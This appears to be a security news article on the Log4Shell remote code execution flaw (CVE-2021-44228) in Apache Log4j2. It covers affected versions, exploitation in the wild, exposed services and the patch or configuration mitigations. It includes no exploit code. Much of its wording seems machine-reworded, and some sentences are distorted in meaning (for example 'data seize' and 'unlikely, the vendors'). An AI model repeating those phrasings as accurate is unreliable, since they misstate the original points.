A remote code execution (RCE) vulnerability in Apache log4j2 was discovered as exploited across the world on the 9th of December 2021. The PoC (Proof-of-Concept) exploits for a critical zero-day vulnerability in the universe Apache Log4j Java-based logging library is currently being transmitted online, revealing home users and enterprise alike to current remote code execution attacks. Log4j is created by the Apache Foundation and is utilized widely by both enterprise applications and cloud services.

Thus, the home users might have transferred away from Java (although the well-known games such as Minecraft are still utilized it), anything from enterprise software or web applications used the product from Apple, Amazon, Cloudflare, Twitter, and Steam is likely vulnerable to RCE exploits targeting the vulnerability.

Current Exploitation, Scans of Vulnerable Systems

The flaw, now tracked as CVE-2021-44228 and also known as Log4Shell or LogJam, is an unauthenticated RCE vulnerability permitting to complete the system takeover on systems with Log4j 2.0-beta9 up to 2.14.1.

It was also reported by the various cloud security team to Apache on the 24th of November. They also disclosed that the CVE-2021-44228 affects the default configuration of multiple Apache frameworks, which includes Apache Struts2, Apache Solr, Apache Druid, Apache Flink, and others.

After the initial proof-of-concept exploit was posted on GitHub in recent days, Attackers starts scanning the Internet for the systems vulnerable to this remotely exploitable security bug that does not need authentication.

Moreover, CERT NZ (New Zealand’s national Computer Emergency Response Team) has issued a security advisory alerting active exploitation in the wild. The Apache Software Foundation states that in Apache Log4j2 versions 2.14.1 and earlier “JNDI features utilized in the configuration, or log messages, and the parameters do not secure against the attackers controlled LDAP and other JNDI-related endpoints.”   

How broad the Attack Surface is?

Apparently, the library is currently utilized in enterprise Java Software. “Given how universal this library is, the impact of this vulnerability is quite serious.”

“So many services are vulnerable to this exploit. Cloud services like Steam, Apple iCloud, and applications like Minecraft have already been discovered to be vulnerable. Any person who utilizes Apache Struts is likely vulnerable. We have seen the same vulnerabilities exploited before in breaches like the 2017 Equifax data seize.”

But this does not stop there: probably there are printers and the CCTV systems going with the default vulnerable configurations. A GitHub project is trying to map out the probable attack surface by listing probably affected manufactures and the elements (which includes the Apache frameworks like Apache Solr).

It is moving to be a long weekend for the security teams across the world as they are trying to pinpoint which applications utilized by their organizations utilize the vulnerable library (and whether it can be exploited), so we can also expect a more precise list getting compiled by the broader security community over the next few days.

What are the Patch and Mitigation Available?

Apache has released Log4j 2.15.0 to address the maximum severity CVE-2021-44228 RCE vulnerability. The bug can also be mitigated in prior updates (2.10 and later) by setting system property “log4j2.formatMsgNoLookups” to “true” or removing the JndiLookup class from the classpath.

Those utilizing the library are suggested to update to the latest version ASAP seeing the threat actor is already searching for exploitable targets. “Likely to other high-profile vulnerabilities such as Heartbleed and Shellshock, Xiarch believes that there will be an escalating number of vulnerable products founded in the weeks to come.”

“Due to the relaxation of exploitation and the breadth of relevance, we suspect ransomware attackers to start leveraging this vulnerability urgently.” So many services are vulnerable to this exploit. Cloud services like Steam, Apple iCloud, and apps like Minecraft have already been discovered to be vulnerable. 

“The log4j package may be bundled in with software you use provided by any given vendor. In this case, unlikely, the vendors themselves will require to push the security updates downstream. As one assesses your own risk and threat model, please consider the elements of the software you utilize and especially what may be publically accessible.”